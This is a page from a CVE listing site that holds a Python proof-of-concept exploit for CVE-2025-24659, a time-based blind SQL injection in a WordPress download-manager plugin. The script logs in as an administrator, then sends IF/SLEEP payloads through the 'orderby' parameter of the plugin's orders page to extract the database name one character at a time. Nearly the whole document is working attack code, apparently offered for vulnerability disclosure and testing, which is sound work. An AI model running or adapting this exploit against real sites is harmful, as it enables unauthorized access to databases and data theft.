4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-24659
README.md
Rendering markdown...
POC / poc.py PY
⬇ Raw GitHub ✕ Close 
import re
import time
import string
import requests


# To set up a proxy, enter the server address below.
PROXY_SERVER = None
proxies = {
    "https": PROXY_SERVER,
    "http": PROXY_SERVER,
}

SLEEP_TIMER = 1

def __login_get_session(login_id, login_pw):
    session = requests.session()
    data = {
        "log": login_id,
        "pwd": login_pw,
        "wp-submit": "Log In",
        "testcookie": 1
    }
    resp = session.post(f"{TARGET}/wp-login.php", data=data, proxies=proxies)
    if True in ["wordpress_logged_in_" in cookie for cookie in resp.cookies.keys()]:
        print(f" |- Successfully logged in with account {login_id}.")
        return session
    else:
        raise Exception(f"[-] Failed to log in.")

def poc_get_db_length(session):
    length = 1
    while True:
        payload = f"1,(IF(LENGTH(DATABASE()) = {length},(SLEEP({SLEEP_TIMER})),0))"
        params = {
            "post_type": "wpdmpro",
            "page": "orders",
            "orderby": payload
        }
        start_time = time.time()
        session.post(f"{TARGET}/wp-admin/edit.php", params=params, proxies=proxies)

        if (time.time() - start_time) < SLEEP_TIMER:
            print(f" |- Database name length is greater than {length}.")
            length += 1
        else:
            print(f" |- Database name length: {length}")
            break

    return length 
    

def poc_get_db_name(session, db_length):
    
    db_name = ""
    for i in range(1, db_length+1):
        for char in string.ascii_letters + string.digits:
            payload = f"1,(IF(SUBSTR(DATABASE(),{i},1)=CHAR({ord(char)}),(SLEEP({SLEEP_TIMER})),0))"
            params = {
                "post_type": "wpdmpro",
                "page": "orders",
                "orderby": payload
            }
            start_time = time.time()
            session.post(f"{TARGET}/wp-admin/edit.php", params=params, proxies=proxies)

            if (time.time() - start_time) > SLEEP_TIMER:
                db_name += char
                print(f" |- Database name: {db_name.ljust(db_length, '*')}")
                break
    
    print(f" |- Successfully extracted the database name: {db_name}")

def poc():
    ####
    # 1. Log in as administrator
    ####
    print(f"[+] Logging in with administrator account.")
    print(f" |- Account: {ADMIN_ID}, Password: {ADMIN_PW}")
    admin_session = __login_get_session(ADMIN_ID, ADMIN_PW)
    admin_session.get(f"{TARGET}/wp-admin/", proxies=proxies)
    
    ###
    # 2. Retrieve database name length
    ###
    print(f"[+] Retrieving database name length.")
    db_length = poc_get_db_length(admin_session)

    ###
    # 3. Retrieve database name
    ###
    print(f"[+] Retrieving database name.")
    poc_get_db_name(admin_session, db_length)


if __name__ == "__main__":

    # WordPress Target
    TARGET = "http://localhost:8080"

    # Administrator ID/PW
    ADMIN_ID = "admin"
    ADMIN_PW = "admin"

    poc()